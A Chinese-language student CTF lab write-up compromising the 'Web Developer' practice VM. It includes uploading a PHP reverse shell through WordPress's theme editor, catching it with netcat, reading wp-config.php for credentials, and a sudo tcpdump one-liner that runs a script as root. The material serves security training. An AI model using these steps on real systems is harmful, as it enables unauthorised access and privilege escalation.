實驗目的

通過對目標靶機的透過程，了解CTF競賽模式，理解CTF涵蓋的知識范圍，如MISC、PPC、WEB等，通過實踐，加強團隊協作能力，掌握初步CTF實戰能力及信息收集能力。熟悉網絡掃描、探測HTTP web服務、目錄枚舉、提權、圖像信息提取、密碼破解等相關工具的使用。

實驗內容、原理

目的：獲取靶機Web Developer 文件/root/flag.txt中flag。

基本思路：本網段IP地址存活掃描(netdiscover)；網絡掃描(Nmap)；瀏覽HTTP 服務；網站目錄枚舉(Dirb)；發現數據包文件 “cap”；分析 “cap” 文件，找到網站管理后臺賬號密碼；插件利用（有漏洞）；利用漏洞獲得服務器賬號密碼；SSH 遠程登錄服務器；tcpdump另類應用。

實施細節如下：

1、發現目標 (netdiscover)，找到WebDeveloper的IP地址。截圖。

2、:利用NMAP掃描目標主機，發現目標主機端口開放、服務情況，截圖并說明目標提供的服務有哪些？（利用第一次實驗知識點）

3、若目標主機提供了HTTP服務，嘗試利用瀏覽器訪問目標網站。截圖。是否有可用信息？

4、利用whatweb探測目標網站使用的CMS模板。截圖。分析使用的CMS是什么？

5、網絡搜索wpscan，簡要說明其功能。

6、使用 Dirb 爆破網站目錄。（Dirb 是一個專門用于爆破目錄的工具，在 Kali 中默認已經安裝，類似工具還有國外的patator，dirsearch，DirBuster， 國內的御劍）截圖。找到一個似乎和網絡流量有關的目錄（路徑）。

5、瀏覽器訪問該目錄（路徑），發現一個cap文件。截圖。

6、利用Wireshark分析該數據包，分析TCP數據流。找到什么有用的信息？截圖。

7、利用上一步得到的信息進入網站后臺。截圖。

（網站管理員賬號與操作系統賬號是不同概念）

8、利用該CMS存在的（插件Plugin）漏洞。

9、利用該插件漏洞提權。

3. 實驗過程

1：先用指令“ifconfig”虛擬機ip，我的是192.168.85.128

再用指令“nmap 192.168.85.1-255”尋找出靶機ip：192.168.85.133

2.可以看到端口開放有：

端口22，22端口是ssh服務，端口22可以實現遠程連接

端口80，80端口是HTTP服務，80是為http協議開放的

上圖可以查詢到靶機IP，用火狐瀏覽器訪問

??剛開始點開覺得沒啥有用信息，然后看到下面有“log in”點進去是需要賬號密碼登入的

用指令“wahtweb+靶機ip”

metagenerator的信息wordpress4.9.8即網站的cms

Wpscan

這是一款Wordpress的專用掃描器，Wordpress作為三大建站模板之一，在全世界范圍內有大量的用戶，這也導致白帽子都會去跟蹤wordpress的安全漏洞，Wordpress自誕生起也出現了很多漏洞。Wordpress還可以使用插件、主題。于是Wordpress本身很難挖掘什么安全問題的時候，安全研究者開始研究其插件、主題的漏洞。通過插件、主題的漏洞去滲透Wordpress站點，于是WPScan應運而生，收集Wordpress的各種漏洞，形成一個Wordpress專用掃描器。

該掃描器可以實現獲取站點用戶名，獲取安裝的所有插件、主題，以及存在漏洞的插件、主題，并提供漏洞信息。同時還可以實現對未加防護的Wordpress站點暴力破解用戶名密碼。

用指令“dirb http://靶機ip”

就會得到ipdata即網絡數據 ?

?

用瀏覽器訪問http://192.168.85.133/ipdata/ ?

點擊1下載，就會得到2的數據包，點ok保存

在kali打開wiershark

打開剛剛下載的analyze.cap

就會得到賬號密碼

瀏覽器回到剛剛log in,輸入賬號密碼登入到后臺

9.上傳反彈shell。

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

【目的：PHP網站滲透；實現途徑：上傳網站后，URL訪問(含有)該反彈shell的頁面。

功能：該腳本會發起反彈TCP連接到攻擊者（腳本中指定攻擊者IP地址和端口號）。】

該CMS為PHP開發，可以利用其實現反彈shell。但必須修改初始化IP地址和端口。（指向攻擊者）。

打開下載后的文件復制代碼

打開后臺網址操作前四個步驟，第三有15，16，17這幾個，我的同學用了15，不過我用16也得，

第五步先把原代碼刪掉，再復制剛剛下載的，然后更改IP（虛擬機ip）和端口（4444），再Update Fire

然后用NC監聽，先在瀏覽器打開修改的目錄“http://192.168.85.133//wp-content/themes/twentyfifteen/404.php”

再在終端模擬器輸入指令“nc -lvp 4444 ”,這樣表示連接成功

再輸入指令“cat var/www/html/wp-config.php”回車就得到賬號密碼

再輸入指令“ssh webdeveloper@ip”

第二部要輸入“yes”

第三步的密碼就是上面得到的，直接復制粘貼就好了

依次輸入以下幾個口令發現沒有權限，需要輸入密碼,嘗試利用上一步獲得的訪問數據庫的用戶名和密碼連接遠程服務器

創建攻擊文件

touch /tmp/exploit1

寫入shellcode

echo 'cat /root/flag.txt'?>?/tmp/exploit

賦予可執行權限

chmod +x /tmp/exploit

利用tcpdump執行任意命令

sudo tcpdump -i eth0 -w /dev/null?-W?1?-G?1?-z /tmp/exploit -Z?root

就可以得到flag

給出tcpdump的命令詳解：

tcpdump命令詳解：

-i eth0 從指定網卡捕獲數據包

-w /dev/null 將捕獲到的數據包輸出到空設備（不輸出數據包結果）

-z [command] 運行指定的命令

-Z [user] 指定用戶執行命令

-G [rotate_seconds] 每rotate_seconds秒一次的頻率執行-w指定的轉儲

-W [nm] 指定抓包數量

總結

以上是生活随笔為你收集整理的信安渗透实验四的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。